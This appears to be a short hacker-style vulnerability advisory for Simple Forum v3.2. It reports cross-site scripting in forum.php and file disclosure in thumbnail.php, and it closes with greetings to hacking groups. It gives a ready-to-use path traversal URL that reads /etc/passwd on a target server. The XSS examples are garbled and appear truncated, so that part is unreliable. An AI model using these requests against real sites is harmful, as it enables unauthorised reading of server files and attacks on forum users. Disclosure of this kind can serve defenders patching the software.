######################################################## # # # SIMPLE FORUM v 3.2 MULTIPLE VULNERABILITIES # # author : tomplixsee # # my email : tomplixsee@yahoo.co.id # # # # software : SIMPLE FORUM v3.2 # # download : http://www.gerd-tentler.de/tools/forum/# # # ######################################################## 1.XSS vulnerable code on forum.php "> ..... example: http://target/path/forum.php?open="/> http://target/path/forum.php?date_show="/> 2.Remote File Disclosure vulnerable code on thumbnail.php example: http://target/path/thumbnail.php?type=3&file=../../../../../../../etc/passwd then try to view the page source :D salam tuk: ira, sukabirus network community, akillers 179,bidulux,sibalbal,crutz_ao,